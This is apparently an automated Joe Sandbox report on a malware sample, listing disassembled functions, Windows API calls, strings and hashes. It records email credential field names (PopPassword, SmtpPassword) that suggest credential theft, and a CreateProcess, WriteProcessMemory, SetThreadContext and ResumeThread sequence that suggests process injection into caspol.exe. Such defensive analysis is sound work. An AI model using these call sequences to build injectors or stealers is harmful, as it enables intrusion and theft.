Part of subcall function 00402B7C: HeapAlloc.KERNEL32(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C

RegOpenKeyExA.KERNEL32(00000032,?,00000000,00020119,00000000,00000009,F4B4ACDC,00000000,00000000,MachineGuid,00000032,00000000,00413DA5,00413987), ref: 00404A9A
RegQueryValueExA.KERNEL32(?,00000000,00000000,00000000,00000000,00000009,00000009,FE9F661A,00000000,00000000), ref: 00404ABC

Memory Dump Source

Source File: 0000001F.00000002.488149240.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_400000_rrwscqkDSNwLK.jbxd

Yara matches

Similarity

API ID: Heap$AllocOpenProcessQueryValue
String ID:
API String ID: 3676486918-0
Opcode ID: df5e51209e30d87507a4750a0631f6435c2f152f95c8b1de61f5c825813b11bc
Instruction ID: c751ae4fb1a51baa23b068920df28fa5e45e9ad9ad003da97b765f6d6e9ada80
Opcode Fuzzy Hash: df5e51209e30d87507a4750a0631f6435c2f152f95c8b1de61f5c825813b11bc
Instruction Fuzzy Hash: A301B1B264010C7EEB01AED69C86DBF7B2DDB81798B10003EF60475182EAB59E1156B9

Function 00404DF3 Relevance: 1.5, APIs: 1, Instructions: 13
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WSAStartup.WS2_32(00000202,?), ref: 00404E08

Memory Dump Source

Source File: 0000001F.00000002.488149240.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_400000_rrwscqkDSNwLK.jbxd

Yara matches

Similarity

API ID: Startup
String ID:
API String ID: 724789610-0
Opcode ID: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
Instruction ID: edfb6e6a7b2c2d2c81179f298452045bbfcf768a57aceb16f5d93ae35c4528ea
Opcode Fuzzy Hash: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
Instruction Fuzzy Hash: 6EC08C32AA421C9FD750AAB8AD0FAF0B7ACD30AB02F0002B56E1DC60C1E550582906E2

Function 00402C1F Relevance: 1.5, APIs: 1, Instructions: 12
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNEL32(?,00000000,E811E8D4,00000000,00000000), ref: 00402C34

Memory Dump Source

Source File: 0000001F.00000002.488149240.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_400000_rrwscqkDSNwLK.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 1e00aa432103c00395cacdadc05548eaee9b0074d701dd53c2a9d16b249f06e7
Instruction ID: cd53f9395925d29cf68d66af6aae64644fca58afce9bbcd5edfe8b9605b00cd0
Opcode Fuzzy Hash: 1e00aa432103c00395cacdadc05548eaee9b0074d701dd53c2a9d16b249f06e7
Instruction Fuzzy Hash: C9B092B00082083EAA002EF59C05C7F3A4DDA4410874044397C08E5411F937DE1012A5

Function 00413A3F Relevance: 1.5, APIs: 1, Instructions: 12
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNELBASE(00000000,00000000,E567384D,00000000,00000000,?,00413B8D,00000000,?,?,004139CC,00000000), ref: 00413A54

Memory Dump Source

Source File: 0000001F.00000002.488149240.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_400000_rrwscqkDSNwLK.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 28892627b4184eb34835cb905e0569b311a61ada9086cb921d1e57989bacd3e5
Instruction ID: a51fc36abc950c8e07eb8ba8f8e19e2949325f4e0a3e122df0d5a7568418e784
Opcode Fuzzy Hash: 28892627b4184eb34835cb905e0569b311a61ada9086cb921d1e57989bacd3e5
Instruction Fuzzy Hash: 52B092B11042087EAA402EF19C05D3B3A4DCA44508B0044357C08E5422E936EE2050A4

Function 004049FF Relevance: 1.5, APIs: 1, Instructions: 11
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegCloseKey.KERNEL32(00000000,00000009,D980E875,00000000,00000000,?,00404A44,?,?,00404AC6,?), ref: 00404A15

Memory Dump Source

Source File: 0000001F.00000002.488149240.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_400000_rrwscqkDSNwLK.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: fd13a4ababa05b6dfa8c376aed1a70cd2f6ce4ef8af563d78b915090b99271a8
Instruction ID: 75bcc15c4d71fff8019d16f1d9debb39272117f3de5fdcc107556e34aff8dcac
Opcode Fuzzy Hash: fd13a4ababa05b6dfa8c376aed1a70cd2f6ce4ef8af563d78b915090b99271a8
Instruction Fuzzy Hash: 7CC092312843087AEA102AE2EC0BF093E0D9B41F98F500025B61C3C1D2E9E3E6100099

Non-executed Functions

Function 0040434D Relevance: 15.1, APIs: 10, Instructions: 135memorycomCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 0040438F
CoCreateInstance.OLE32(00418EC0,00000000,00000001,00418EB0,?), ref: 004043A9
VariantInit.OLEAUT32(?), ref: 004043C4
SysAllocString.OLEAUT32(?), ref: 004043CD
VariantInit.OLEAUT32(?), ref: 00404414
SysAllocString.OLEAUT32(?), ref: 00404419
VariantInit.OLEAUT32(?), ref: 00404431

Memory Dump Source

Source File: 0000001F.00000002.488149240.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_400000_rrwscqkDSNwLK.jbxd

Yara matches

Similarity

API ID: InitVariant$AllocString$CreateInitializeInstance
String ID:
API String ID: 1312198159-0
Opcode ID: 513fbf6384ec98fcae1358c4661a671bc025351e7b653efb5643f1f3667a8473
Instruction ID: 6cc2ba4480fbb4d68866773ab5e076051400aafb7d2546f6199fc19a864342a4
Opcode Fuzzy Hash: 513fbf6384ec98fcae1358c4661a671bc025351e7b653efb5643f1f3667a8473
Instruction Fuzzy Hash: 9A414C71A00609EFDB00EFE4DC84ADEBF79FF89314F10406AFA05AB190DB759A458B94

Function 0040D069 Relevance: 12.6, Strings: 10, Instructions: 138COMMON

Download Yara Rule

Strings

EmailAddress, xrefs: 0040D074
PopServer, xrefs: 0040D099
PopPort, xrefs: 0040D0A7
SmtpPort, xrefs: 0040D0EB
PopPassword, xrefs: 0040D0D0
SmtpServer, xrefs: 0040D0DC
Technology, xrefs: 0040D08D
PopAccount, xrefs: 0040D0B6
SmtpAccount, xrefs: 0040D0FA
SmtpPassword, xrefs: 0040D117

Memory Dump Source

Source File: 0000001F.00000002.488149240.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_400000_rrwscqkDSNwLK.jbxd

Yara matches

Similarity

API ID:
String ID: EmailAddress$PopAccount$PopPassword$PopPort$PopServer$SmtpAccount$SmtpPassword$SmtpPort$SmtpServer$Technology
API String ID: 0-2111798378
Opcode ID: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
Instruction ID: 091e628055053f5eef329adcdd4db079f25726ad560f051e033024c376855220
Opcode Fuzzy Hash: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
Instruction Fuzzy Hash: AE414EB5941218BADF127BE6DD42F9E7F76EF94304F21003AF600721B2C77A99609B48

Function 00402B7C Relevance: 2.5, APIs: 2, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
HeapAlloc.KERNEL32(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C

Memory Dump Source

Source File: 0000001F.00000002.488149240.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_400000_rrwscqkDSNwLK.jbxd

Yara matches

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
Instruction ID: b98118a04cfb303fc975c2cf6dbcabe8739d57b69ee549b18d4bacd194132a09
Opcode Fuzzy Hash: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
Instruction Fuzzy Hash: 14D05E36A01A24B7CA212FD5AC09FCA7F2CEF48BE6F044031FB0CAA290D675D91047D9

Function 0040317B Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.488149240.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_400000_rrwscqkDSNwLK.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
Instruction ID: 125f84157e295c2adc52e6f8c9cb261871d96e12da6c9e12f7e31892ee598d11
Opcode Fuzzy Hash: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
Instruction Fuzzy Hash: 0B01A272A10204ABDB21DF59C885E6FF7FCEB49761F10417FF804A7381D639AE008A64

Function 004061C3 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 151COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,?,?,?,00414449), ref: 004061F4
_wmemset.LIBCMT ref: 00406244
_wmemset.LIBCMT ref: 00406261

Strings

IDA, xrefs: 00406304
IDA, xrefs: 004061E5, 00406276, 004062AC, 0040621D, 004061E8, 00406220, 0040628B

Memory Dump Source

Source File: 0000001F.00000002.488149240.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_400000_rrwscqkDSNwLK.jbxd

Yara matches

Similarity

API ID: _wmemset$ErrorLast
String ID: IDA$IDA
API String ID: 887189805-2020647798
Opcode ID: d1a4e7134676979b6b57f8278ca938aa0c19887f4db682e2a4dd920a4280672c
Instruction ID: 96d4363135ba53d30ed73ccdf96fe48b30064626948d25b168d4296351bbaec2
Opcode Fuzzy Hash: d1a4e7134676979b6b57f8278ca938aa0c19887f4db682e2a4dd920a4280672c
Instruction Fuzzy Hash: 6641B372900206BAEB10AFE69C46EEF7B7CDF95714F11007FF901B61C1EE799A108668

Function 00404E17 Relevance: 7.6, APIs: 5, Instructions: 72networkCOMMON

Download Yara Rule

APIs

getaddrinfo.WS2_32(00000000,00000001,?,00000000), ref: 00404E4F
socket.WS2_32(?,?,?), ref: 00404E7A
freeaddrinfo.WS2_32(00000000), ref: 00404E90

Memory Dump Source

Source File: 0000001F.00000002.488149240.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_400000_rrwscqkDSNwLK.jbxd

Yara matches

Similarity

API ID: freeaddrinfogetaddrinfosocket
String ID:
API String ID: 2479546573-0
Opcode ID: 3e5dcc4db61406608786f9b0aa712dad600a8c5e5b05f0ce84802de4921d3fb8
Instruction ID: d63855dbb6a3d3c0c8ebf90f2bb9ce8455fd2b7eef63007fec5ba55d39dacf84
Opcode Fuzzy Hash: 3e5dcc4db61406608786f9b0aa712dad600a8c5e5b05f0ce84802de4921d3fb8
Instruction Fuzzy Hash: 9621BBB2500109FFCB106FA0ED49ADEBBB5FF88315F20453AF644B11A0C7399A919B98

Analysis Process: caspol.exePID: 956, Parent PID: 532COMMON

Execution Graph

Execution Coverage:	14.5%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	146
Total number of Limit Nodes:	13

Executed Functions

Function 00C01113 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.521654291.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_c00000_caspol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 09b16d88aba3a4ea6cab77341289eba3f3e29373960c8ee6fcc67c48d040b962
Instruction ID: 2994b180b1dc29077558f9ced0b3d84d88af4922b21cb7a4b3f70555667e20a4
Opcode Fuzzy Hash: 09b16d88aba3a4ea6cab77341289eba3f3e29373960c8ee6fcc67c48d040b962
Instruction Fuzzy Hash: 38A00210C5E685C0C1400E82420C2B4D23CAB0F356F3A7655684E378D34A77D100F51C

Function 0019E2C5 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 325
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0019E597

Strings

g+, xrefs: 0019E4EA
g+, xrefs: 0019E6DF
g+, xrefs: 0019E61A

Memory Dump Source

Source File: 00000026.00000002.521107537.0000000000190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_190000_caspol.jbxd

Similarity

API ID: CreateProcess
String ID: g+$g+$g+
API String ID: 963392458-1611974567
Opcode ID: 5849bc67e764dec3196d5ba7d6bdeb9316e3c7f55ab5cad6288830c19f40d51e
Instruction ID: 3dd8fb575657cf556366c2f32cd7cf148c0242cfe7fbc89aade4033a14d26946
Opcode Fuzzy Hash: 5849bc67e764dec3196d5ba7d6bdeb9316e3c7f55ab5cad6288830c19f40d51e
Instruction Fuzzy Hash: 12C11371D002198FDF24CFA8C845BEEBBF1BB09304F0495AAD819B7294DB749A85CF95

Function 0019E2D0 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 323
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0019E597

Strings

g+, xrefs: 0019E4EA
g+, xrefs: 0019E6DF
g+, xrefs: 0019E61A

Memory Dump Source

Source File: 00000026.00000002.521107537.0000000000190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_190000_caspol.jbxd

Similarity

API ID: CreateProcess
String ID: g+$g+$g+
API String ID: 963392458-1611974567
Opcode ID: 5da53e7c84f77fe697c5bf0f2c4ec6317cc33f4e9f6576b6ed47e9faee7d27b8
Instruction ID: 9d07d3acb4ae9e87d54b05c3ca17523821bf451da8be7609d94db4e4c93d3af5
Opcode Fuzzy Hash: 5da53e7c84f77fe697c5bf0f2c4ec6317cc33f4e9f6576b6ed47e9faee7d27b8
Instruction Fuzzy Hash: EDC11371D002198FDF24CFA8C845BEEBBF1BB09304F0495AAD819B7290DB749A85CF95

Function 0019DF31 Relevance: 1.6, APIs: 1, Instructions: 120
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0019E00B

Memory Dump Source

Source File: 00000026.00000002.521107537.0000000000190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_190000_caspol.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 952d789a0c23ec3ba621fa80faf9a3704beeb23c682e3d7160dff76dc4e3e200
Instruction ID: 073193b8b2d156858b4b37843c7e1d803cfac0321d5e4e6f198fb878b4c53a9f
Opcode Fuzzy Hash: 952d789a0c23ec3ba621fa80faf9a3704beeb23c682e3d7160dff76dc4e3e200
Instruction Fuzzy Hash: 7A41B9B4D012499FCF10CFA9D984AEEFBF1BB49314F24902AE815B7210D375AA45CF64

Function 0019DF38 Relevance: 1.6, APIs: 1, Instructions: 118
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0019E00B

Memory Dump Source

Source File: 00000026.00000002.521107537.0000000000190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_190000_caspol.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: cee96f654d85f953c1873cf38af11ed44b0410ecba38ff025cc0c83697d924b0
Instruction ID: 16e6ec810fc3d400b1ea377b0c5623cca184f6856cc8abd169ecfeef505a188d
Opcode Fuzzy Hash: cee96f654d85f953c1873cf38af11ed44b0410ecba38ff025cc0c83697d924b0
Instruction Fuzzy Hash: BE41AAB4D002589FCF10CFA9D984AEEFBF1BB49314F24942AE814B7210D375AA45CF64

Function 0019E090 Relevance: 1.6, APIs: 1, Instructions: 110
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0019E14A

Memory Dump Source

Source File: 00000026.00000002.521107537.0000000000190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_190000_caspol.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 610797e251b54165bac3f0740e82b4ed463200260950f675c07fe6314e5a17bb
Instruction ID: 77f25c31a95ae5f1552f5c14a1b9df92e62ae1b261bc19377fd9ef68ad1099a9
Opcode Fuzzy Hash: 610797e251b54165bac3f0740e82b4ed463200260950f675c07fe6314e5a17bb
Instruction Fuzzy Hash: 3541BAB9D002589FCF10CFA9D984AEEFBB1BF49314F24942AE815B7200D375A945CF64

Function 0019E098 Relevance: 1.6, APIs: 1, Instructions: 108
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0019E14A

Memory Dump Source

Source File: 00000026.00000002.521107537.0000000000190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_190000_caspol.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 3a1012dc48440a7e90f5158db160f1ad8b3e25ed44a267ca432ce6066149196a
Instruction ID: 015f60b1e39aa9605c153c0d88d367fc099436ff786eb2349d332fca9252424d
Opcode Fuzzy Hash: 3a1012dc48440a7e90f5158db160f1ad8b3e25ed44a267ca432ce6066149196a
Instruction Fuzzy Hash: 1F41A8B9D002589FCF10CFAAD984AEEFBB1BF49310F24942AE814B7200D735A945CF65

Function 0019DE09 Relevance: 1.6, APIs: 1, Instructions: 105
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0019DEBA

Memory Dump Source

Source File: 00000026.00000002.521107537.0000000000190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_190000_caspol.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 5d32387c0ffc17fe8b4b18087c220bde0700d2f693277ec7a79cb41325a9585d
Instruction ID: d7b9d59a93639eab659260f3fd745dbedf633fd64e1fc90dd8ecfd140f8639d8
Opcode Fuzzy Hash: 5d32387c0ffc17fe8b4b18087c220bde0700d2f693277ec7a79cb41325a9585d
Instruction Fuzzy Hash: 5341BAB8D002489FCF10CFA9E980AEEFBB1BB49310F10942AE815B7310C335A905CF54

Function 0019DE10 Relevance: 1.6, APIs: 1, Instructions: 103
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0019DEBA

Memory Dump Source

Source File: 00000026.00000002.521107537.0000000000190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_190000_caspol.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: ffce95b9df027d677984ea62fe6bbc9145f08b17c01c0782c35f90fb6f8b233f
Instruction ID: 6409f3dbbac61d5c47a40c7012830b0b23ccb744ec9de60be5118d0fe57d0ab8
Opcode Fuzzy Hash: ffce95b9df027d677984ea62fe6bbc9145f08b17c01c0782c35f90fb6f8b233f
Instruction Fuzzy Hash: 7C419BB5D002589FCF10CFA9D984AEEFBB1BB49310F10942AE815B7314D735A945CFA5

Function 0019D8A1 Relevance: 1.6, APIs: 1, Instructions: 98
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 0019D957

Memory Dump Source

Source File: 00000026.00000002.521107537.0000000000190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_190000_caspol.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: b7b397415746b1c8ec1dc1f738bde17881c980f141b0e05a918da0ad576becdd
Instruction ID: 70f71d9751a0e520745b0ef5c36777ab23d4327a2d5c08d2215d97b7cde09849
Opcode Fuzzy Hash: b7b397415746b1c8ec1dc1f738bde17881c980f141b0e05a918da0ad576becdd
Instruction Fuzzy Hash: 1841BCB5D002589FCF10DFA9D984AEEFBB1AF49314F24842AE455B7244C738AA49CF54

Function 0019D8A8 Relevance: 1.6, APIs: 1, Instructions: 96
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 0019D957

Memory Dump Source

Source File: 00000026.00000002.521107537.0000000000190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_190000_caspol.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 1e59929c1c209cd97e7ab2c866f55f65c4a340e578130e96f1c952901c31f593
Instruction ID: dac8ff7eac0cfd21b7ecffbb57bad665fe96a246777c3684888acfae62fd11df
Opcode Fuzzy Hash: 1e59929c1c209cd97e7ab2c866f55f65c4a340e578130e96f1c952901c31f593
Instruction Fuzzy Hash: 9141ACB5D002599FCF10DFAAD984AEEFBB1BF49314F24842AE414B7244D738A945CF54

Function 0019D7B1 Relevance: 1.6, APIs: 1, Instructions: 78
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ResumeThread.KERNELBASE(?), ref: 0019D836

Memory Dump Source

Source File: 00000026.00000002.521107537.0000000000190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_190000_caspol.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: dd685a2ccc447d07a4beb42da7187459d68dc935fc146e827b063c6d858cf8b7
Instruction ID: d94e4014c61518510910817cb1a8b11eadbefef5a80facd1788f717cdb8295e5
Opcode Fuzzy Hash: dd685a2ccc447d07a4beb42da7187459d68dc935fc146e827b063c6d858cf8b7
Instruction Fuzzy Hash: EF31C9B4D002189FCF14CFA9E984AEEFBB1AF49314F24946AE815B7300C735A906CF95

Function 0019D7B8 Relevance: 1.6, APIs: 1, Instructions: 75threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE(?), ref: 0019D836

Memory Dump Source

Source File: 00000026.00000002.521107537.0000000000190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_190000_caspol.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: a25fa6f2d1dad5e56820dffa7afa88e0a163e1b9e4b15565cac6b30da5c1273b
Instruction ID: 42cb62e13c1c88abd88711f16f863e59abe8e46d7bbe984c316bb545e33961f6
Opcode Fuzzy Hash: a25fa6f2d1dad5e56820dffa7afa88e0a163e1b9e4b15565cac6b30da5c1273b
Instruction Fuzzy Hash: 4431BAB4D002189FCF14CFAAE984AAEFBB5AF49314F24942AE814B7300C735A905CF94

Function 00C00D3C Relevance: 1.4, Strings: 1, Instructions: 104COMMON

Download Yara Rule

Strings

g+, xrefs: 00C00D6E

Memory Dump Source

Source File: 00000026.00000002.521654291.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_c00000_caspol.jbxd

Similarity

API ID:
String ID: g+
API String ID: 0-1647415484
Opcode ID: 43ee16d2a1be356c2199cddbe00d643f68cedf70769b7a6f3981ea6dfae5419f
Instruction ID: 0a38eee013ccba69c638077b81cbdea49da6ccd5f2496ada47d2e61b10dcff58
Opcode Fuzzy Hash: 43ee16d2a1be356c2199cddbe00d643f68cedf70769b7a6f3981ea6dfae5419f
Instruction Fuzzy Hash: FE412875D45219DBCB24CFA5C8807E8F7B9BF99300F2096AAD519B6280EB706AC4DF40

Function 00C00F33 Relevance: 1.3, Strings: 1, Instructions: 34COMMON

Download Yara Rule

Strings

(, xrefs: 00C01808

Memory Dump Source

Source File: 00000026.00000002.521654291.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_c00000_caspol.jbxd

Similarity

API ID:
String ID: (
API String ID: 0-3887548279
Opcode ID: 487fdb7677caf383cdf766b254165cbd226bfc3238f43553dea04699d4a01270
Instruction ID: 69a76adba3404da5ba81625c46f1ae3a43c1a4232d2b049be8ea5f0951fb99a4
Opcode Fuzzy Hash: 487fdb7677caf383cdf766b254165cbd226bfc3238f43553dea04699d4a01270
Instruction Fuzzy Hash: FF01A43594A228DFDB60CF68C944BE9F7B5AB09304F549299D80DA3291C7319E85CF00

Function 00C00E9A Relevance: .1, Instructions: 97COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.521654291.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_c00000_caspol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9358c2db75573d62303fb0b6cc0224aa56d35b6ea465698b3446285df323bd0b
Instruction ID: e480d2026415ffb7c09564507f5035d7fe191bc53813b6c0209b8053bc3cb190
Opcode Fuzzy Hash: 9358c2db75573d62303fb0b6cc0224aa56d35b6ea465698b3446285df323bd0b
Instruction Fuzzy Hash: 4C410A74909228CFCB64CF55D854BE8F7F9AB4A315F2891DA980EA72D1C7319AC5DF00

Function 0013D1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.521047827.000000000013D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0013D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_13d000_caspol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f96b653f214e75f19fd19daed920a72af6fe0ab76211e5c6c0e021f36c48d5d0
Instruction ID: 03c992a4348eac45ac72be90a8f484c26676ca76a0b44247905b8b03d1444a50
Opcode Fuzzy Hash: f96b653f214e75f19fd19daed920a72af6fe0ab76211e5c6c0e021f36c48d5d0
Instruction Fuzzy Hash: 5721C2B5604240EFDB16CF14F9C0B26BBA5FB84314F24C5A9E8494B256C736D84ACB61

Function 0013D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.521047827.000000000013D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0013D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_13d000_caspol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5bac1f1d1689a2ef3b0582937e6aeb3e2dc750e4a8c24c5729f060c24c9b42c2
Instruction ID: 4d967bc66fc9d1a25c83f1b7f0c5bf5a08a76d64203610675017b6464fe62645
Opcode Fuzzy Hash: 5bac1f1d1689a2ef3b0582937e6aeb3e2dc750e4a8c24c5729f060c24c9b42c2
Instruction Fuzzy Hash: 8721B0B5604240EFDB19CF24F8C4B26BB65EB84B14F34C5A9E8494B256C736D84BCBA1

Function 00C00EBE Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.521654291.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_c00000_caspol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae9884ce5aa06249c1abf39205c0da532ce5372a60e88cb616ac14ae4776dfb6
Instruction ID: 484030da73469486b42e689e179e152b63bb2574a34c02dccd2bd4577c902e42
Opcode Fuzzy Hash: ae9884ce5aa06249c1abf39205c0da532ce5372a60e88cb616ac14ae4776dfb6
